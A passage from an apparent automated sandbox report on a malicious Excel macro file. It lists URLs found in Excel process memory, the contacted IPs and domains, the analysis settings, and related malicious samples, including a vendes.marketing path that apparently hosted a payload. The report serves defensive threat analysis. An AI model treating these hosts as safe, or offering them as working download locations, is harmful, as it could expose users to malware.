00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/besta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                                                          unknown
                                                                          https://login.windows.net/common/oauth2/authorizeSEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oauEXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://login.windows.net/common/oauth2/authorizeHEXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                                                                  high
                                                                                  https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-inmobiliarias-consbesta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                                                                    unknown
                                                                                    https://login.windows.net/common/oauth2/authorizeLEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://login.windows.net/common/oauth2/authorizeMEXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://login.windows.net/common/oauth2/authorizeNEXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://vendes.marketing/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2besta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                                                                            unknown
                                                                                            https://login.windows.net/common/oauth2/authorizeOEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://login.windows.net/common/oauth2/authorizeAEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://login.windows.net/common/oauth2/authorizeBEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonoEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://login.windows.net/common/oauth2/authorizeCEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://powerlift.acompli.netIEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                                                        unknown
                                                                                                        https://substrate.office.com/search/api/v1/SearchHistory7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                                                                                          high
                                                                                                          https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.cbesta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                                                                                            unknown
                                                                                                            https://login.windows.net/common/oauth2/authorizeFEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://login.windows.net/common/oauth2/authorize=EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://login.windows.net/common/oauth2/authorize?EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://login.windows.net/common/oauth2/authorize0EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://login.windows.net/common/oauth2/authorize1EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);srcbesta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                                                                                                        unknown
                                                                                                                        https://login.windows.net/common/oauth2/authorize3EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://devnull.onenote.com7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                                                                                                            high
                                                                                                                            https://login.windows.net/common/oauth2/authorize6EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://login.windows.net/common/oauth2/authorize.EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://login.windows.net/common/oauth2/authorize/EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingEXCEL.EXE, 00000000.00000002.766449411.00000000132B0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496724357.00000000132DA000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://skyapi.live.net/Activity/EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1024x348.pngP0UY3TPH.htm.0.drfalse
                                                                                                                                      unknown
                                                                                                                                      https://api.cortana.ai7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSLEXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpfalse
                                                                                                                                        high

                                                                                                                                        Contacted IPs

                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs

                                                                                                                                        Public

                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        162.240.9.126
                                                                                                                                        standoutglobal.comUnited States
                                                                                                                                        46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                        107.180.46.229
                                                                                                                                        vendes.marketingUnited States
                                                                                                                                        26496AS-26496-GO-DADDY-COM-LLCUSfalse

                                                                                                                                        General Information

                                                                                                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                        Analysis ID:532474
                                                                                                                                        Start date:02.12.2021
                                                                                                                                        Start time:10:22:08
                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 9m 8s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:light
                                                                                                                                        Sample file name:SCAN_7295943480515097.xlsm
                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                        Run name:Potential for more IOCs and behavior
                                                                                                                                        Number of analysed new started processes analysed:22
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • HDC enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal68.expl.winXLSM@3/7@2/2
                                                                                                                                        EGA Information:Failed
                                                                                                                                        HDC Information:Failed
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                        • Number of executed functions: 0
                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Adjust boot time
                                                                                                                                        • Enable AMSI
                                                                                                                                        • Found application associated with file extension: .xlsm
                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                        • Attach to Office via COM
                                                                                                                                        • Scroll down
                                                                                                                                        • Close Viewer
                                                                                                                                        Warnings:
                                                                                                                                        Show All
                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.88.177, 52.109.12.24, 52.109.76.34
                                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                        • Execution Graph export aborted for target EXCEL.EXE, PID 5980 because there are no executed function
                                                                                                                                        • Not all processes where analyzed, report is missing behavior information

                                                                                                                                        Simulations

                                                                                                                                        Behavior and APIs

                                                                                                                                        No simulations

                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                        IPs

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        162.240.9.126SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                                          107.180.46.229SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                                          • vendes.marketing/transmigrant/Wplzr/
                                                                                                                                          Purchase Inquiry&Product Specification.exeGet hashmaliciousBrowse
                                                                                                                                          • www.nihongo.school/cu6s/?u6utf=W50CE7q4q9oP7gRqIAd9YQ9RaMYKauZAxq11Ezs86ZRrs4WUxbwZ3395pe/S2qg7huHC&9rN46F=xVMHGdB8

                                                                                                                                          Domains

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          vendes.marketingSCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229

                                                                                                                                          ASN

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          UNIFIEDLAYER-AS-1USSCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                                          • 162.240.9.126
                                                                                                                                          INVOICE.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.214.80.6
                                                                                                                                          img20048901738_Pago.pdf.exeGet hashmaliciousBrowse
                                                                                                                                          • 192.185.115.3
                                                                                                                                          PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 162.241.126.156
                                                                                                                                          PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 162.241.126.156
                                                                                                                                          New order documents. pdf..............exeGet hashmaliciousBrowse
                                                                                                                                          • 108.179.232.76
                                                                                                                                          part-1500645108.xlsbGet hashmaliciousBrowse
                                                                                                                                          • 162.241.62.201
                                                                                                                                          img20048901740_Pago.pdf.exeGet hashmaliciousBrowse
